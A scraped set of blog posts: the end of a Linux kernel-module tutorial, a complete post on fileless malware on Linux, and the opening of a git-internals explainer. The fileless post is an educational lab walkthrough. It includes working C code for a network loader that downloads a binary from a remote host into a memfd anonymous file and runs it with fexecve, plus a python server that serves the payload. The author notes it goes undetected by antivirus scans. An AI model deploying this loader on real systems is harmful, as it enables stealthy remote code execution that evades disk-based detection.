MODPOST 1 modules CC /vagrant_data/task-1/HelloWorld.mod.o LD [M] /vagrant_data/task-1/HelloWorld.ko make[1]: Leaving directory `/usr/src/kernels/3.10.0-1160.62.1.el7.x86_64\u0026#39; Once the module is successfully built, we can test it by loading the module using the insmod command.\n[vagrant@centos7 task-1]$ ls -l *.ko -rw-r--r--. 1 vagrant vagrant 101880 May 25 18:03 HelloWorld.ko [vagrant@centos7 task-1]$ sudo insmod HelloWorld.ko [vagrant@centos7 task-1]$ dmesg | tail -1 [35803.038855] Hello World! [vagrant@centos7 task-1]$ lsmod | head -2 Module Size Used by HelloWorld 12496 0 The metadata information coded in the LKM can be checked with the modinfo command.\n[vagrant@centos7 task-1]$ modinfo HelloWorld.ko filename: /vagrant_data/task-1/HelloWorld.ko description: Eudyptula task1 author: ayedaemon license: GPL retpoline: Y rhelversion: 7.9 srcversion: 7969E1C9B651C03B53BA6B2 depends: vermagic: 3.10.0-1160.62.1.el7.x86_64 SMP mod_unload modversions At last, the module can be unloaded easily with the rmmod command.\n[vagrant@centos7 task-1]$ sudo rmmod HelloWorld.ko [vagrant@centos7 task-1]$ dmesg | tail -2 [35803.038855] Hello World! [35983.753824] Bye Bye World! Conclusion Hopefully you have built your first loadable kernel module (LKM). Despite the simplicity of the functionality of this module, there was a lot of material to cover. By the end of this article: you should have a broad idea of how loadable kernel modules work; you should have your system configured to build, load and unload such modules; and, you should be able to define custom parameters for your LKMs.\nJust remember that you are completely on your own in kernel land. There are no backstops or second chances for your code. If you’re quoting a project for a client, be sure to double, if not triple, the anticipated debugging time.
Kernel code has to be as perfect as possible to ensure the integrity and reliability of the systems that will run it.\nIf there is no \\n character at the end of the printk() string, then the next printk() string will also be printed in dmesg. I was able to see both Hello World! and Bye Bye World at the same time when I was either loading or unloading the module.\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/core-api/printk-basics.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nLinux kernel licensing rules - https://www.kernel.org/doc/html/latest/process/license-rules.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/05/eudyptula-task-1/","summary":"What is this? The Eudyptula Challenge is a series of programming exercises for the Linux kernel, that start from a very basic “Hello world” kernel module, moving on up in complexity to getting patches accepted into the main Linux kernel source tree.\nUnfortunately, this project is not accepting any new applicants right now. So I decided to gather tasks details from other online sources and complete them locally.\nTask-1 This is Task 01 of the Eudyptula Challenge ------------------------------------------ Write a Linux kernel module, and stand-alone Makefile, that when loaded prints to the kernel debug log level, \u0026#34;Hello World!","title":"Eudyptula Task1"},{"content":" What are file-less malwares? How do they work on linux?\nAccording to Wikipedia, file-less malware is a variant of computer related malicious software that exists exclusively as a computer memory-based artifact i.e. in RAM.\nIn other words, the malware/program is never written to harddisk but directly loaded in memory.\nTo get a better understanding of how that happens in linux, we need to understand how a normal program loads itself into memory and executes itself. If you already know this, feel free to skip next section.\nHow normal program loads and executes itself? 
This is a \u0026ldquo;HUGE\u0026rdquo; topic for a mere blog post. So we\u0026rsquo;ll just scratch the surface and understand about ELF files. ELF Files are main binary format in use on modern Linux systems, and support for it is implemented in the file fs/binfmt_elf.c.\nLet\u0026rsquo;s build our own C program to generate an ELF binary so we can follow and know what we are doing.\nCreate a C program file with vim not_hello_world.c, and paste the below code into it.\n#include \u0026lt;stdio.h\u0026gt; int main(int argc, char* argv[], char* envp[]) { // Prints total argument count passed to executable printf(\u0026#34;Argument count : %2d\\n\u0026#34;, argc); // Prints the arguments list along with memory location printf(\u0026#34;Arguments list :\\n\u0026#34;); for(int i=0; i\u0026lt;argc; i++) { printf(\u0026#34;\\targv[%1$d] =[ %2$p ]==\u0026gt; %2$s\\n\u0026#34;, i, argv[i]); } // Prints all the environment variables passed to executable printf(\u0026#34;Environment list :\\n\u0026#34;); for(int i=0; envp[i]; i++) { printf(\u0026#34;\\tenvp[%1$d] =[ %2$p ]==\u0026gt; %2$s\\n\u0026#34;, i, envp[i]); } } The above code will print out the argc, argv and envp values to the standard output.\nCompile it : gcc not_hello_world.c -o not_hello_world.o\nCheck file type : file not_hello_world.o\nnot_hello_world.o: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=82cad832f6d9b9a2d071be6bca3ccab87c8c71f6, for GNU/Linux 3.2.0, not stripped Run it : ./not_hello_world.o 12345 123 12345678901234567890 1234\nArgument count : 5 Arguments list : argv[0] =[ 0x7ffd3bd9370c ]==\u0026gt; ./not_hello_world.o argv[1] =[ 0x7ffd3bd93720 ]==\u0026gt; 12345 argv[2] =[ 0x7ffd3bd93726 ]==\u0026gt; 123 argv[3] =[ 0x7ffd3bd9372a ]==\u0026gt; 12345678901234567890 argv[4] =[ 0x7ffd3bd9373f ]==\u0026gt; 1234 Environment list : envp[0] =[ 0x7ffd3bd93744 ]==\u0026gt; SHELL=/bin/bash envp[1] =[ 0x7ffd3bd93754 
]==\u0026gt; LANGUAGE=en_US: envp[2] =[ 0x7ffd3bd93764 ]==\u0026gt; PWD=/home/vagrant/workspace/blog_junk envp[3] =[ 0x7ffd3bd9378a ]==\u0026gt; LOGNAME=vagrant envp[4] =[ 0x7ffd3bd9379a ]==\u0026gt; XDG_SESSION_TYPE=tty envp[5] =[ 0x7ffd3bd937af ]==\u0026gt; MOTD_SHOWN=pam envp[6] =[ 0x7ffd3bd937be ]==\u0026gt; HOME=/home/vagrant envp[7] =[ 0x7ffd3bd937d1 ]==\u0026gt; LANG=en_US.UTF-8 envp[8] =[ 0x7ffd3bd937e2 ]==\u0026gt; LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36: envp[9] =[ 0x7ffd3bd93dc4 ]==\u0026gt; SSH_CONNECTION=10.0.2.2 
34954 10.0.2.15 22 envp[10] =[ 0x7ffd3bd93def ]==\u0026gt; LESSCLOSE=/usr/bin/lesspipe %s %s envp[11] =[ 0x7ffd3bd93e11 ]==\u0026gt; XDG_SESSION_CLASS=user envp[12] =[ 0x7ffd3bd93e28 ]==\u0026gt; TERM=tmux-256color envp[13] =[ 0x7ffd3bd93e3b ]==\u0026gt; LESSOPEN=| /usr/bin/lesspipe %s envp[14] =[ 0x7ffd3bd93e5b ]==\u0026gt; USER=vagrant envp[15] =[ 0x7ffd3bd93e68 ]==\u0026gt; SHLVL=1 envp[16] =[ 0x7ffd3bd93e70 ]==\u0026gt; XDG_SESSION_ID=6 envp[17] =[ 0x7ffd3bd93e81 ]==\u0026gt; XDG_RUNTIME_DIR=/run/user/1000 envp[18] =[ 0x7ffd3bd93ea0 ]==\u0026gt; SSH_CLIENT=10.0.2.2 34954 22 envp[19] =[ 0x7ffd3bd93ebd ]==\u0026gt; XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop envp[20] =[ 0x7ffd3bd93efe ]==\u0026gt; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin envp[21] =[ 0x7ffd3bd93f66 ]==\u0026gt; DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus envp[22] =[ 0x7ffd3bd93f9c ]==\u0026gt; SSH_TTY=/dev/pts/0 envp[23] =[ 0x7ffd3bd93faf ]==\u0026gt; _=./not_hello_world.o envp[24] =[ 0x7ffd3bd93fc5 ]==\u0026gt; OLDPWD=/home/vagrant/workspace This still does not gives us what is happening behind the scenes, but it tells us that each program has some dedicated memory space where it stores a copy of arguments and environment variables in continuous memory locations. To gather more information we can use the strace utility to trace the system calls made by our program.\nCommand: strace ./not_hello_world.o myarg1 myarg2 myarg3 2\u0026gt;strace_output.log 1\u0026gt;program_output.log\nNOTE:- 2(stderr) redirected to strace_output.log file and 1(stdout) redirected to program_output.log file\ncommand : cat strace_output.log\nexecve(\u0026#34;./not_hello_world.o\u0026#34;, [\u0026#34;./not_hello_world.o\u0026#34;, \u0026#34;myarg1\u0026#34;, \u0026#34;myarg2\u0026#34;, \u0026#34;myarg3\u0026#34;], 0x7ffe0dbf2cf8 /* 25 vars */) = 0 brk(NULL) = 0x5593be003000 arch_prctl(0x3001 /* ARCH_??? 
*/, 0x7ffea24b4bc0) = -1 EINVAL (Invalid argument) access(\u0026#34;/etc/ld.so.preload\u0026#34;, R_OK) = -1 ENOENT (No such file or directory) openat(AT_FDCWD, \u0026#34;/etc/ld.so.cache\u0026#34;, O_RDONLY|O_CLOEXEC) = 3 fstat(3, {st_mode=S_IFREG|0644, st_size=28934, ...}) = 0 mmap(NULL, 28934, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff99a640000 close(3) = 0 openat(AT_FDCWD, \u0026#34;/lib/x86_64-linux-gnu/libc.so.6\u0026#34;, O_RDONLY|O_CLOEXEC) = 3 read(3, \u0026#34;\\177ELF\\2\\1\\1\\3\\0\\0\\0\\0\\0\\0\\0\\0\\3\\0\u0026gt;\\0\\1\\0\\0\\0\\360q\\2\\0\\0\\0\\0\\0\u0026#34;..., 832) = 832 pread64(3, \u0026#34;\\6\\0\\0\\0\\4\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0\u0026#34;..., 784, 64) = 784 pread64(3, \u0026#34;\\4\\0\\0\\0\\20\\0\\0\\0\\5\\0\\0\\0GNU\\0\\2\\0\\0\\300\\4\\0\\0\\0\\3\\0\\0\\0\\0\\0\\0\\0\u0026#34;, 32, 848) = 32 pread64(3, \u0026#34;\\4\\0\\0\\0\\24\\0\\0\\0\\3\\0\\0\\0GNU\\0\\t\\233\\222%\\274\\260\\320\\31\\331\\326\\10\\204\\276X\u0026gt;\\263\u0026#34;..., 68, 880) = 68 fstat(3, {st_mode=S_IFREG|0755, st_size=2029224, ...}) = 0 mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff99a63e000 pread64(3, \u0026#34;\\6\\0\\0\\0\\4\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0@\\0\\0\\0\\0\\0\\0\\0\u0026#34;..., 784, 64) = 784 pread64(3, \u0026#34;\\4\\0\\0\\0\\20\\0\\0\\0\\5\\0\\0\\0GNU\\0\\2\\0\\0\\300\\4\\0\\0\\0\\3\\0\\0\\0\\0\\0\\0\\0\u0026#34;, 32, 848) = 32 pread64(3, \u0026#34;\\4\\0\\0\\0\\24\\0\\0\\0\\3\\0\\0\\0GNU\\0\\t\\233\\222%\\274\\260\\320\\31\\331\\326\\10\\204\\276X\u0026gt;\\263\u0026#34;..., 68, 880) = 68 mmap(NULL, 2036952, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff99a44c000 mprotect(0x7ff99a471000, 1847296, PROT_NONE) = 0 mmap(0x7ff99a471000, 1540096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x25000) = 0x7ff99a471000 mmap(0x7ff99a5e9000, 303104, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x19d000) = 0x7ff99a5e9000 
mmap(0x7ff99a634000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff99a634000 mmap(0x7ff99a63a000, 13528, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff99a63a000 close(3) = 0 arch_prctl(ARCH_SET_FS, 0x7ff99a63f540) = 0 mprotect(0x7ff99a634000, 12288, PROT_READ) = 0 mprotect(0x5593bdded000, 4096, PROT_READ) = 0 mprotect(0x7ff99a675000, 4096, PROT_READ) = 0 munmap(0x7ff99a640000, 28934) = 0 fstat(1, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0 brk(NULL) = 0x5593be003000 brk(0x5593be024000) = 0x5593be024000 write(1, \u0026#34;Argument count : 4\\nArguments li\u0026#34;..., 3244) = 3244 exit_group(0) = ? +++ exited with 0 +++ At first this looks confusing and difficult to understand, but it is simple and straightforward once you understand the format of the output.\n# Format of the strace output. syscall(arg1, arg2, arg3, ... ) = Return value With that in mind, line 1 of the strace_output.log file is clear: we are calling the execve syscall and passing arguments to it.\nAccording to man 2 execve \u0026ndash;\u0026gt; execve() executes the program referred to by pathname. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments.\nSo the execve() syscall is what actually loads the executable ELF file into memory!! Interestingly, our binary gathers all the data to be printed and then prints it at once at the end with a single write() syscall. That happens because stdout was redirected to a file, so the C library fully buffers the output and flushes it on exit. The return value of write() is the number of bytes the syscall wrote. This is the exact number of chars that were supposed to be written to stdout, which we redirected to a file. 
We can check that the byte count in the file matches the byte count returned by the write() syscall, using \u0026ndash;\u0026gt; wc -c program_output.log\noutput:\n3244 program_output.log With this, we know how a normal program gets executed in memory. The diagram below summarizes it for a quick recap.\nC program │ │ │ Compiles │ ▼ ELF binary │ │ │ execve │ ▼ loaded in memory Idea of file-less? In the usual scenario, a compiled malicious binary is stored on the victim\u0026rsquo;s machine and is then executed somehow for the attacker\u0026rsquo;s purpose. In that case we have several simple methods and tools to analyze the binary and find out what it is going to do. Most of the time, our antivirus can scan the system\u0026rsquo;s harddisk and tell whether there is malware on it or not.\nAnd we all trust our anti-virus for that!! 😜\nBut what if an attacker somehow loaded the ELF file directly into memory, without writing it to the harddisk (not even a temp file)? In linux, one of the ways to do that is via the memfd_create() syscall. This creates an \u0026ldquo;anonymous file\u0026rdquo; and returns a \u0026ldquo;file descriptor\u0026rdquo; to it.\nOK! This had me with the first line of the man page - man 2 memfd_create. But there is more to it.\nmemfd_create() creates an anonymous file and returns a file descriptor that refers to it. The file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. However, unlike a regular file, it lives in RAM and has a volatile backing storage. Once all references to the file are dropped, it is automatically released. Anonymous memory is used for all backing pages of the file. Therefore, files created by memfd_create() have the same semantics as other anonymous memory allocations such as those allocated using mmap(2) with the MAP_ANONYMOUS flag. We can now create a file directly in RAM; all we need is a way to execute it. 
We could have used the same old execve for this, but we don\u0026rsquo;t have a file pathname to begin with. After looking through the variants of the exec family of functions, I stumbled upon fexecve() - execute program specified via file descriptor.\nNow we have both: a way to create in-memory files with memfd_create() and a way to execute them with fexecve(). We just need a program that glues everything together with some neat logic to make things work the way we want.\nFirst fileless program in C I\u0026rsquo;ve written a simple C program (loader.c) that creates an in-memory file, copies the data of a (local) binary to it, and then executes it. Simple, isn\u0026rsquo;t it.\n#define _GNU_SOURCE /* Must come before any #include; see feature_test_macros(7) */ #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;sys/mman.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; #include \u0026lt;errno.h\u0026gt; #include \u0026lt;string.h\u0026gt; #define BUFF_SIZE 1024 int memfd_create(const char *name, unsigned int flags); // Prints usage of the program - takes program name as argument - argv[0] void usage(char* prog) { char *use = \u0026#34;USAGE: %1$s /path/to/binary arg_to_binary1 arg_to_binary2 ...\\n\u0026#34;; printf(use, prog); } // Prints error message and the error number message; exits with errno. void die(char* msg) { int err = errno; printf(\u0026#34;[ - ] %s\\n\u0026#34;, msg); printf(\u0026#34;[ ? ] %s\\n\u0026#34;, strerror(err)); exit(err); } int main(int argc, char* argv[], char* envp[]) { int fd1, fd2; char buff[BUFF_SIZE] = {0}; // Creates a buffer with all values as 0; if (argc \u0026lt; 2) { // Checks if any argument is passed or not. 
usage(argv[0]); exit(1); } // Create mem file (fd1) printf(\u0026#34;[ * ] Trying to create a mem file...\\n\u0026#34;); fd1 = memfd_create(\u0026#34;testfd\u0026#34;, 0); if (fd1 \u0026lt; 0) die(\u0026#34;Can\u0026#39;t create memfd file\u0026#34;); printf(\u0026#34;[ + ] Created mem file and attached to fd = %d\\n\u0026#34;, fd1); // Read a local binary (fd2) and write to mem file (fd1) printf(\u0026#34;[ * ] Reading %s file\\n\u0026#34;, argv[1]); if ((fd2 = open(argv[1], O_RDONLY)) == -1) die(\u0026#34;Can\u0026#39;t open file\u0026#34;); printf(\u0026#34;\\n ----------------------------------- \\n\u0026#34;); int i = 0, j = 0; int read_count = 0, write_count = 0; while( (read_count = read(fd2, buff, BUFF_SIZE)) != 0 ) { if( (write_count = write(fd1, buff, read_count)) == -1) die(\u0026#34;Failed to write to mem file\u0026#34;); i += read_count; j += write_count; printf(\u0026#34;\\rRead count = %6d | Write count = %3d\u0026#34;, i, j); } printf(\u0026#34;\\n ----------------------------------- \\n\u0026#34;); printf(\u0026#34;[ + ] Starting execution...\\n\u0026#34;); // Change argv params; removes the argv[0] // printf(\u0026#34;%s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); for(int i=0; i\u0026lt;argc; ++i) argv[i] = argv[i+1]; // printf(\u0026#34;%s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); // Execute fd1 - with new argv and same envp fexecve(fd1, argv, envp); // If fexecve returns, then it is failed. printf(\u0026#34;Failed Executing....\\n\u0026#34;); return errno; } We should give some time to understand this code on why and how it\u0026rsquo;ll load what in memory.\nWe can compile this code to generate an ELF file with gcc loader.c -o loader.o; Once compiled, we can run it with ./loader.o\nSince there are no arguments(argc\u0026lt;2), it should fail with usage information on stdout.\nUSAGE: ./loader.o /path/to/binary arg_to_binary1 arg_to_binary2 ... 
Let\u0026rsquo;s try again with some arguments this time.\n./loader.o /usr/bin/file loader.o This time things will not be same as last time. It\u0026rsquo;ll :-\nCreates an in-memory file and gets a file descriptor back (fd1). Opens local binary file (argv[1] = /usr/bin/file); Stores this file descriptor in fd2. Read-write loop until everything from fd2 is written in fd1. Change argv to be passed to in-mem file. The new argv value should look like \u0026ndash;\u0026gt; /usr/bin/file arg1 arg2 arg3. This means we just have to remove the argv[0] and set everything remaining in proper index values. Execute fd1 \u0026ndash;\u0026gt; in-memory file. Output:\n[ * ] Trying to create a mem file... [ + ] Created mem file and attached to fd = 3 [ * ] Reading /usr/bin/file file ----------------------------------- Read count = 27104 | Write count = 27104 ----------------------------------- [ + ] Starting execution... loader.o: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=426a7743592788cd18c92a76f22ccfb632700d7b, for GNU/Linux 3.2.0, with debug_info, not stripped Last line of the output is the proof that our in-memory file executed successfully\u0026hellip; Now we can take it to next level.\nloading binary from network Till this point, we know how to write a basic code to load a local binary, create a in-mem file for it and then execute it.\nBut an attacker won\u0026rsquo;t just use it run the local binaries which can be executed directly, instead he would like to execute a binary sitting on his server and load that into victim\u0026rsquo;s system directly in memory. This will not be detected with the help of any disk analysis tool or commands like ls. Also, this will be executing safe from \u0026ldquo;Anti-Virus\u0026rdquo; software complete disk-scan features. 
In theory, attacker could run anything from his system on victim\u0026rsquo;s system without leaving any trace on harddisk.\nTo simulate this, I\u0026rsquo;ve created a pre-setup with a server that hosts a malicious binary and victim\u0026rsquo;s system where we have the loader.o present.\nWithout further ado, let\u0026rsquo;s get things prepared for out test. We need 3 things:\nloader binary (on victim\u0026rsquo;s machine) malicious binary (on attacker\u0026rsquo;s machine) tcp socket server to host malicious binary (on attacker\u0026rsquo;s machine) I started out with a (not so) malicious binary, which simply creates a plain-text file when executed.\nSource Code: malicious_program.c\n#include \u0026lt;stdio.h\u0026gt; int main() { char* data = \u0026#34;This malicious program wishes you to have a good day!!\u0026#34;; FILE* fPtr = fopen(\u0026#34;NOTICE_for_U.txt\u0026#34;, \u0026#34;w\u0026#34;); if(!fPtr) return 1; fputs(data, fPtr); fclose(fPtr); return 0; } Compile it -\u0026gt; gcc malicious_program.c -o malicious_program.o\nNext, I wrote a small python tcp socket server that will host the malicious_program.o binary.\nSource Code: python_server.py\n# Read binary with open(\u0026#34;malicious_program.o\u0026#34;, \u0026#34;rb\u0026#34;) as f: data = f.read() print(len(data)) # Host it on 192.168.56.56:1234 import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((\u0026#39;192.168.56.56\u0026#39;, 1234)) s.listen(1) conn, addr = s.accept() print(conn, addr) # Prints the incoming Connection details conn.sendall(data) conn.close() Finally, we modify the previous local binary loader code to read from connected socket instead of a local binary.\nSource code: network_loader.c\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;sys/mman.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;sys/socket.h\u0026gt; #include 
\u0026lt;arpa/inet.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; #include \u0026lt;errno.h\u0026gt; #include \u0026lt;string.h\u0026gt; #define _GNU_SOURCE /* See feature_test_macros(7) */ #define BUFF_SIZE 1024 int memfd_create(const char *name, unsigned int flags); void usage(char* prog) { char *use = \u0026#34;USAGE: %1$s Destination Port ...\\n\u0026#34;; printf(use, prog); } void die(char* msg) { printf(\u0026#34;[ - ] %s\\n\u0026#34;, msg); printf(\u0026#34;[ ? ] %s\u0026#34;, strerror(errno)); exit(errno); } int main(int argc, char* argv[], char* envp[]) { int fd1; char buff[BUFF_SIZE] = {0}; if (argc \u0026lt; 2) { usage(argv[0]); exit(1); } // Create mem file (fd1) printf(\u0026#34;[ * ] Trying to create a mem file...\\n\u0026#34;); fd1 = memfd_create(\u0026#34;testfd\u0026#34;, 0); if (fd1 \u0026lt; 0) die(\u0026#34;Can\u0026#39;t create memfd file\u0026#34;); printf(\u0026#34;[ + ] Created mem file and attached to fd = %d\\n\u0026#34;, fd1); // Socket stuff begins here struct sockaddr_in serv_addr; int sock = 0; if ((sock = socket(AF_INET, SOCK_STREAM, 0)) \u0026lt; 0) die(\u0026#34;Socket not created\u0026#34;); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(strtol(argv[2], NULL, 10)); // set port if(inet_pton(AF_INET, argv[1], \u0026amp;serv_addr.sin_addr)\u0026lt;=0) // set address die(\u0026#34;Invalid address\u0026#34;); if (connect(sock, (struct sockaddr *)\u0026amp;serv_addr, sizeof(serv_addr)) \u0026lt; 0) // connect die(\u0026#34;Connection failed\u0026#34;); printf(\u0026#34;\\n ----------------------------------- \\n\u0026#34;); int i = 0, j = 0; int read_count = 0, write_count = 0; while( (read_count = read( sock , buff, BUFF_SIZE)) != 0 ) { if( (write_count = write(fd1, buff, read_count)) == -1) die(\u0026#34;Failed to write to mem file\u0026#34;); i += read_count; j += write_count; printf(\u0026#34;\\rRead count = %6d | Write count = %3d\u0026#34;, i, j); } printf(\u0026#34;\\n ----------------------------------- 
\\n\u0026#34;); printf(\u0026#34;[ + ] Starting execution...\\n\u0026#34;); // Change argv params // printf(\u0026#34;BEFORE: %s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); for(int i=0; i\u0026lt;argc; ++i) argv[i] = argv[i+1]; // printf(\u0026#34;AFTER: %s %s %s %s\\n\u0026#34;, argv[0], argv[1], argv[2], argv[3]); // Execute fd1 - with new argv fexecve(fd1, argv, envp); // If fexecve returns, then it is failed. printf(\u0026#34;Failed Executing....\\n\u0026#34;); return errno; } Compile it \u0026ndash;\u0026gt; gcc network_loader.c -o network_loader.o\nWith this, we have everything ready with us. Some more steps and we are done.\nStart the python server on attacker\u0026rsquo;s machine. - python3 python_server.py Place the network_loader.o on victim\u0026rsquo;s machine. Politely ask the victim to execute the binary - ./network_loader.o 192.168.56.56 1234 Sit back and enjoy! ## On Attacker\u0026#39;s machine $ python3 python_server.py 16800 \u0026lt;socket.socket fd=4, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=(\u0026#39;192.168.56.56\u0026#39;, 1234), raddr=(\u0026#39;192.168.56.56\u0026#39;, 50812)\u0026gt; (\u0026#39;192.168.56.56\u0026#39;, 50812) ## on victim\u0026#39;s machine $ ./network_loader.o 192.168.56.56 1234 [ * ] Trying to create a mem file... [ + ] Created mem file and attached to fd = 3 ----------------------------------- Read count = 16800 | Write count = 16800 ----------------------------------- [ + ] Starting execution... And if we check the victim\u0026rsquo;s working directory we can see a file with name NOTICE_for_U.txt there\u0026hellip;. which confirms that the remote binary successfully ran on victim\u0026rsquo;s machine.\nVoila! We just executed a remotely located binary without leaving anytrace on harddisk for further analysis. What we have is a loader binary that reads unknown data from somewhere and just executes it. 
And there is nothing in the loader binary that most automated analysis tools could detect as malicious\u0026hellip; even VirusTotal does not detect it for what it is.\nCVE-2021-4034 is a local privilege escalation vulnerability that was found in polkit\u0026rsquo;s pkexec utility. I\u0026rsquo;m not sure if this is a false positive or a match based on similar signatures.\nReferences How programs get run: ELF binaries (lwn.net) Chapter 3 - Memory Management (tldp.org) Fileless Malwares (wikipedia.org) what is fileless malware (norton.com) covert code faces a heap of trouble in memory (sophos.com) Intelligence: File less threats (microsoft.com) ","permalink":"https://ayedaemon.github.io/post/2022/02/fileless-malwares-how-and-why/","summary":"What are file-less malwares? How do they work on linux?\nAccording to Wikipedia, file-less malware is a variant of computer related malicious software that exists exclusively as a computer memory-based artifact i.e. in RAM.\nIn other words, the malware/program is never written to harddisk but directly loaded in memory.\nTo get a better understanding of how that happens in linux, we need to understand how a normal program loads itself into memory and executes itself.","title":"File-less malwares: what and how"},{"content":" Inside out approach to learn git\nGit is one of the most common version control systems used today. And the fact that it was developed by the kernel developers explains why it is very complex and has a very bad interface. And most of the commands don\u0026rsquo;t make much sense at first.\nBut behind the scenes git uses a bunch of tricks in different combinations to make everything work. And once you understand them, all the git commands start making much more sense than ever. For this we need to understand the git internals. 
(There is a lot to the git internals but we are just going to cover a few of them)\nUnderstanding git internals To understand this, we first need to create a git repository and start working on it. For that, I have created a simple folder play-git here to start playing around. This is usually referred as working area or working repository or working directory.\nNext step after this will be creating/initializing a git repository. This can be done using git init command in the working directory.\n[ OUTPUT ]:\nInitialized empty Git repository in /home/ayedaemon/extra/playground/play-git/.git/ This will create a .git folder in my working repo as indicated by the output of git init command (above).\nThis .git folder is generally called git repository. This is the place where all of the git magic resides. All your configuration files, repo description, commit histories, information about branches, and other git related things are present here in this directory.\nYou can think of git as a filesystem. You add, delete, modify, tag, etc..to this filesystem and there are mainly 4 types of objects involved in the whole process - blob, tree, commit, annotated tags. (Read more about git objects)\nThis gives us idea that we need to monitor .git repository for changes after we run each command and understand the relation between those.\nAfter git init this is the state of my repository. This is the initial state. So git init basically creates an initial state of this repository in the working area.\nAs it can be seen there are multiple hooks setting.. But they are just samples as of now. We can create our own hooks as per the need. These are simple scripts used to perform some automated tasks on some specific actions. (Read more about hooks)\nMost important thing is the HEAD. This is a file which is like a pointer to the commit we are pointing. Mostly all the changes we make are made using HEAD somehow.\nHEAD points to master for now. 
